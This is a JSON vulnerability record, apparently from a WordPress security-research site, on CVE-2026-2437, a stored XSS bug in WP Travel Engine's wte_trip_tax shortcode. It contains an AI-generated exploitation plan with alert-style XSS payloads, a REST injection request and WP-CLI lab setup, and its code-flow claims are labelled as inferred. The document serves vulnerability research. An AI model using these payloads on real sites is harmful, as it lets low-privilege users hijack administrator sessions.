[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUUFnv_p8Kl642zUDjId0cr80R73CvsQHqQ0xy1iFGn0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":9,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":39},"CVE-2026-2437","wp-travel-engine-travel-and-tour-booking-plugin-authenticated-contributor-stored-cross-site-scripting-via-wtetriptax-sho","WP Travel Engine - Travel and Tour Booking Plugin \u003C= 6.7.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via wte_trip_tax Shortcode","The WP Travel Engine – Tour Booking Plugin – Tour Operator Software plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wte_trip_tax' shortcode in all versions up to, and including, 6.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-travel-engine",null,"\u003C=6.7.5","6.7.6","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 19:44:38","2026-04-04 08:25:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F46731877-03e1-4552-8993-3b121b457b1b?source=api-prod",1,[22,23,24,25,26,27,28],"README.txt","admin\u002Fclass-wp-travel-engine-admin.php","admin\u002Fmeta-parts\u002Fenquiry.php","changelog.txt","dist\u002Fblocks\u002Ftrip-pages\u002Fsearch\u002Fblock.php","dist\u002Fbundle\u002Fsingle-trip.bundle.js","dist\u002Fbundle\u002Ftrip-booking-modal.bundle.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-2437 - WP Travel Engine Shortcode XSS\n\n## 1. Vulnerability Summary\nThe **WP Travel Engine** plugin (up to version 6.7.5) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the handler for the `wte_trip_tax` shortcode. Due to insufficient sanitization of shortcode attributes (such as `before`, `after`, or `taxonomy`) and a failure to escape these values before they are returned\u002Fechoed in the HTML output, a user with **Contributor** level permissions or higher can inject malicious JavaScript into a post or page. This script executes in the context of any user (including Administrators) who views the affected content.\n\n## 2. Attack Vector Analysis\n- **Shortcode:** `[wte_trip_tax]`\n- **Vulnerable Attributes:** Likely `before`, `after`, `taxonomy`, or `class` (common taxonomy shortcode parameters).\n- **Authentication Level:** Contributor or higher (anyone with `edit_posts` capability).\n- **Endpoint:** Any page or post where shortcodes can be processed (Post Editor).\n- **Payload Carry:** The payload is embedded directly into the shortcode attributes within the post content.\n\n## 3. Code Flow\n1. **Registration:** The plugin registers the shortcode (likely in a main initialization file or a dedicated shortcode class) using `add_shortcode( 'wte_trip_tax', 'callback_function' )`.\n2. **Processing:** When a post containing `[wte_trip_tax ...]` is rendered, WordPress calls the associated callback function.\n3. **Attribute Handling:** The callback uses `shortcode_atts()` to merge user-provided attributes with defaults. \n4. **The Sink:** The callback function likely constructs an HTML string and includes the attribute values directly. For example:\n   ```php\n   \u002F\u002F Inferred vulnerable pattern\n   $output = $atts['before'] . $taxonomy_links . $atts['after'];\n   return $output; \u002F\u002F Missing esc_html() or wp_kses()\n   ```\n5. **Rendering:** The unescaped string is returned to the WordPress content filter and rendered in the browser, executing the XSS.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not require a specific plugin-defined nonce for the *execution* of the XSS, as shortcodes are interpreted by the WordPress core rendering engine. However, to *inject* the payload, the attacker must be able to save a post.\n\n### Extraction via Browser (If needed for AJAX\u002FGutenberg):\nIf the exploit were to be performed via a specialized plugin endpoint that requires a nonce:\n1. **Identify Script Localization:** Check for `wp_localize_script` in the plugin source.\n2. **Shortcode Presence:** The plugin's assets are typically enqueued on Trip pages or pages using the shortcode.\n3. **Creation:** Create a page with the shortcode using WP-CLI.\n   `wp post create --post_type=page --post_status=publish --post_content='[wte_trip_tax]'`\n4. **Extraction:**\n   - Use `browser_navigate` to the created page.\n   - Use `browser_eval(\"window.wte_obj?.nonce\")` (Replace `wte_obj` with the actual localization key found in source, though for standard shortcode XSS, this is unnecessary).\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that a Contributor can inject a script that executes for an Administrator.\n\n### Step-by-Step Plan:\n1. **Login as Contributor:** Obtain cookies for a user with the Contributor role.\n2. **Prepare Payload:** Use a standard XSS payload that breaks out of common HTML contexts.\n   `[wte_trip_tax before=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]`\n3. **Inject via Post Creation:** Use the `http_request` tool to create or update a post with the payload. Since we are simulating a Contributor, we will use the WordPress REST API or the standard `post.php` endpoint.\n4. **Trigger XSS:** Navigate to the published post as an Administrator.\n\n### Required HTTP Request (Post Creation):\n**URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n**Method:** `POST`\n**Headers:** \n- `Content-Type: application\u002Fjson`\n- `Authorization: [Contributor Auth Header]`\n**Body:**\n```json\n{\n  \"title\": \"Trip Overview\",\n  \"content\": \"[wte_trip_tax before=\\\"\u003Cimg src=x onerror=alert('CVE-2026-2437')>\\\"]\",\n  \"status\": \"pending\"\n}\n```\n*Note: Contributors usually \"Submit for Review\" (pending), but an Admin viewing the \"Preview\" or \"Edit\" page will still trigger the XSS.*\n\n## 6. Test Data Setup\n1. **Target User:** Ensure a user with role `contributor` exists.\n   `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2. **Target Trip (Optional):** Some taxonomy shortcodes require a valid post ID or the context of a specific post type. If the shortcode fails without a \"Trip\", create one:\n   `wp post create --post_type=trip --post_title=\"Sample Trip\" --post_status=publish`\n3. **Payload Page:** Create a page containing the shortcode.\n   `wp post create --post_type=post --post_author=[AttackerID] --post_content='[wte_trip_tax before=\"\u003Cscript>alert(1)\u003C\u002Fscript>\"]' --post_status=pending`\n\n## 7. Expected Results\n- When an Administrator views the \"Pending\" post or the \"Preview\" of the post in the WordPress dashboard, an alert box with `CVE-2026-2437` (or `1`) should appear.\n- Inspecting the page source should reveal the raw `\u003Cscript>` or `\u003Cimg>` tag inside the `wp-travel-engine` output container.\n\n## 8. Verification Steps\n1. **Check Database:** Verify the payload is stored in the `wp_posts` table.\n   `wp db query \"SELECT post_content FROM wp_posts WHERE post_content LIKE '%wte_trip_tax%';\" `\n2. **Frontend Inspection:** Check the HTTP response of the rendered post for the unescaped payload.\n   - Use `http_request` to GET the post URL.\n   - Search the body for `\u003Cimg src=x onerror=alert`.\n\n## 9. Alternative Approaches\n- **Attribute Breakout:** If `before` is sanitized but `class` is not:\n  `[wte_trip_tax class=\"\\\" onmouseover=\\\"alert(1)\\\"\"]`\n- **Taxonomy Injection:** If the `taxonomy` attribute is reflected:\n  `[wte_trip_tax taxonomy=\"\u003Cscript>alert(1)\u003C\u002Fscript>\"]`\n- **Gutenberg Block:** The plugin likely provides a Gutenberg block that wraps this shortcode. The exploit can also be tested by saving a block with malicious attributes via the REST API.","The WP Travel Engine plugin for WordPress is vulnerable to Authenticated (Contributor+) Stored Cross-Site Scripting via the 'wte_trip_tax' shortcode in versions up to and including 6.7.5. This vulnerability arises from insufficient input sanitization and output escaping of user-supplied shortcode attributes, allowing attackers to inject arbitrary web scripts into posts or pages.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-travel-engine\u002F6.7.5\u002Fadmin\u002Fclass-wp-travel-engine-admin.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-travel-engine\u002F6.7.6\u002Fadmin\u002Fclass-wp-travel-engine-admin.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-travel-engine\u002F6.7.5\u002Fadmin\u002Fclass-wp-travel-engine-admin.php\t2026-02-02 02:13:46.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-travel-engine\u002F6.7.6\u002Fadmin\u002Fclass-wp-travel-engine-admin.php\t2026-02-23 02:06:50.000000000 +0000\n@@ -148,8 +148,8 @@\n \t * Exclude custom trips (from manual booking) from trip count on Trips list.\n \t *\n \t * @param \\stdClass $counts An object containing the post counts by status.\n-\t * @param string   $type   Post type.\n-\t * @param string   $perm   Permission level.\n+\t * @param string    $type   Post type.\n+\t * @param string    $perm   Permission level.\n \t * @return \\stdClass Modified counts.\n \t * @since 6.7.3\n \t *\u002F\n@@ -253,6 +253,7 @@\n \t\t\t\t'position'    => 19,\n \t\t\t\t'condition'   => file_exists( WPTRAVELENGINE_UPDATES_DATA_PATH . '\u002Fdata.json' ),\n \t\t\t),\n+\t\t\t'wptravelengine-logs'                => new \\WPTravelEngine\\Logger\\Admin\\LogsPage(),\n \t\t);\n \n \t\t$menus = apply_filters( 'wptravelengine-admin:boooking:submenus', $menus );\n@@ -2520,6 +2521,11 @@\n \t\t\t$wp_travel_engine_setting          = get_post_meta( $enquiry_id, 'wp_travel_engine_setting', true );\n \t\t\t$wp_travel_engine_enquiry_formdata = get_post_meta( $enquiry_id, 'wp_travel_engine_enquiry_formdata', true );\n \t\t\t$wte_old_enquiry_details           = isset( $wp_travel_engine_setting['enquiry'] ) ? $wp_travel_engine_setting['enquiry'] : array();\n+\n+\t\t\t$enquiry_display       = wptravelengine_get_enquiry_form_field_map( isset( $wp_travel_engine_enquiry_formdata['package_id'] ) ? absint( $wp_travel_engine_enquiry_formdata['package_id'] ) : 0 );\n+\t\t\t$enquiry_field_map     = $enquiry_display['field_map'];\n+\t\t\t$validation_only_types = $enquiry_display['validation_only_types'];\n+\n \t\t\tob_start();\n \t\t\t?>\n \t\t\t\u003Cdiv style=\"background-color:#ffffff\" class=\"wpte-main-wrap wpte-edit-enquiry\">\n@@ -2530,12 +2536,12 @@\n \t\t\t\t\t\t\t\t\u003C?php\n \t\t\t\t\t\t\t\tif ( ! empty( $wp_travel_engine_enquiry_formdata ) ) :\n \t\t\t\t\t\t\t\t\tforeach ( $wp_travel_engine_enquiry_formdata as $key => $data ) :\n-\t\t\t\t\t\t\t\t\t\t$data       = is_array( $data ) ? implode( ', ', $data ) : $data;\n-\t\t\t\t\t\t\t\t\t\t$data_label = wp_travel_engine_get_enquiry_field_label_by_name( $key );\n-\n-\t\t\t\t\t\t\t\t\t\tif ( 'package_name' === $key ) {\n-\t\t\t\t\t\t\t\t\t\t\t$data_label = esc_html__( 'Package Name', 'wp-travel-engine' );\n+\t\t\t\t\t\t\t\t\t\tif ( wptravelengine_enquiry_should_hide_field( $key, $enquiry_field_map, $validation_only_types ) ) {\n+\t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n+\n+\t\t\t\t\t\t\t\t\t\t$data       = is_array( $data ) ? implode( ', ', $data ) : $data;\n+\t\t\t\t\t\t\t\t\t\t$data_label = wptravelengine_enquiry_get_field_display_label( $key, $enquiry_field_map );\n \t\t\t\t\t\t\t\t\t\t?>\n \t\t\t\t\t\t\t\t\t\t\u003Cli>\n \t\t\t\t\t\t\t\t\t\t\t\u003Cb>\u003C?php echo esc_html( $data_label ); ?>\u003C\u002Fb>","To exploit this vulnerability, an attacker must have at least Contributor-level authentication. The attacker creates or edits a post and inserts the [wte_trip_tax] shortcode, including a malicious JavaScript payload within attributes like 'before' or 'after' (e.g., [wte_trip_tax before=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]). When the post is saved or submitted for review, the payload is stored in the database. When an administrator or any other user views the post (including in the admin preview mode), the shortcode handler renders the unescaped attribute, executing the script in the user's browser context.","gemini-3-flash-preview","2026-04-17 21:33:42","2026-04-17 21:34:19",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","6.7.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-travel-engine\u002Ftags\u002F6.7.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-travel-engine.6.7.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-travel-engine\u002Ftags\u002F6.7.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-travel-engine.6.7.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-travel-engine\u002Ftags"]